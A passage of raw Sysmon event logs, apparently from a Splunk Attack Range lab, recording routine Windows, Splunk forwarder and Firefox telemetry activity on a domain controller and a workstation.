Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57269-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048959Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:41.715{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1263961E677D3FA9791E3ADD4166BF86,SHA256=93A77D433C9DCD845A500B8018398ACF6DCA33AA8662D6D682622029B0052E9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807659Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:41.505{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA0FDB74238E639C5F1E62EAA1FE8820,SHA256=17F14E0D435C66C0D5539ADE3E809FD3F97259BB1F862C21DA6C4F7922EC243C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048989Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.985{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F4CA-60EB-377D-00000000CF01}6724C:\Program Files\Mozilla 
Firefox\pingsender.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048988Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.985{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F4CA-60EB-377D-00000000CF01}6724C:\Program Files\Mozilla Firefox\pingsender.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048987Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:42.953{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F4CA-60EB-387D-00000000CF01}9232C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048986Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.953{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F4CA-60EB-387D-00000000CF01}9232C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048985Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.938{466BC892-F4CA-60EB-387D-00000000CF01}92324384C:\Windows\system32\conhost.exe{466BC892-F4CA-60EB-377D-00000000CF01}6724C:\Program Files\Mozilla Firefox\pingsender.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048984Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:42.938{466BC892-0664-60E8-6503-00000000CF01}40242236C:\Windows\system32\csrss.exe{466BC892-F4CA-60EB-387D-00000000CF01}9232C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048983Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.936{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048982Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:42.935{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048981Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.935{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048980Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:42.935{466BC892-0664-60E8-6503-00000000CF01}40242236C:\Windows\system32\csrss.exe{466BC892-F4CA-60EB-377D-00000000CF01}6724C:\Program Files\Mozilla Firefox\pingsender.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048979Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.935{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048978Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.935{466BC892-F4CA-60EB-367D-00000000CF01}75207904C:\Program Files\Mozilla Firefox\default-browser-agent.exe{466BC892-F4CA-60EB-377D-00000000CF01}6724C:\Program Files\Mozilla Firefox\pingsender.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Mozilla Firefox\default-browser-agent.exe+36236|C:\Program Files\Mozilla Firefox\default-browser-agent.exe+38617|C:\Program Files\Mozilla 
Firefox\default-browser-agent.exe+68438|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048977Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.934{466BC892-F4CA-60EB-377D-00000000CF01}6724C:\Program Files\Mozilla Firefox\pingsender.exe89.0.2-FirefoxMozilla Foundationpingsender.exe"C:\Program Files\Mozilla Firefox\pingsender.exe" https://incoming.telemetry.mozilla.org/submit/default-browser-agent/default-browser/1/0460A459-2B40-4601-917A-1BE137E24F51 "C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Pending Pings\0460A459-2B40-4601-917A-1BE137E24F51"C:\Windows\system32\ATTACKRANGE\Administrator{466BC892-0667-60E8-D79D-240000000000}0x249dd72HighMD5=137DDE1BDB39C075B053CE5D9B7E6128,SHA256=E742ED8B37CB571059AAE1DA272F1821D1AD3D9855CBB7ABA98DCFA0260ACA28,IMPHASH=AF27FA7223A9B6FE80447A0E6715E632{466BC892-F4CA-60EB-367D-00000000CF01}7520C:\Program Files\Mozilla Firefox\default-browser-agent.exe"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task "308046B0AF4A39CB" 10341000x80000000000000001048976Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.915{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F4CA-60EB-367D-00000000CF01}7520C:\Program Files\Mozilla Firefox\default-browser-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048975Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.915{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F4CA-60EB-367D-00000000CF01}7520C:\Program Files\Mozilla 
Firefox\default-browser-agent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048974Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.915{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4CA-60EB-367D-00000000CF01}7520C:\Program Files\Mozilla Firefox\default-browser-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048973Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.868{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=2F720C0B8D1C23B77D77A046757B178A,SHA256=8744CE718E24F9B349B84B21BD2B806B76FEEDD32DB760A566F54C15BAA27466,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048972Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:42.868{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048971Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.868{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=330BDF34367DB435124D2026C6CD23AA,SHA256=A70A278929D4D369F7048A2EF6FC0B60DC550C621759DDFC57B2E467D4878BAD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048970Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.836{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F4CA-60EB-367D-00000000CF01}7520C:\Program Files\Mozilla 
Firefox\default-browser-agent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048969Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.836{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F4CA-60EB-367D-00000000CF01}7520C:\Program Files\Mozilla Firefox\default-browser-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048968Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:42.799{466BC892-0664-60E8-6503-00000000CF01}40242236C:\Windows\system32\csrss.exe{466BC892-F4CA-60EB-367D-00000000CF01}7520C:\Program Files\Mozilla Firefox\default-browser-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048967Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.799{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048966Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:42.799{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048965Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.799{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048964Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:42.799{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048963Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.799{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F4CA-60EB-367D-00000000CF01}7520C:\Program Files\Mozilla Firefox\default-browser-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048962Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.799{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F4CA-60EB-367D-00000000CF01}7520C:\Program Files\Mozilla 
Firefox\default-browser-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\UBPM.dll+acf0|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b55|C:\Windows\SYSTEM32\ntdll.dll+6585d|C:\Windows\SYSTEM32\ntdll.dll+656c0|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048961Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 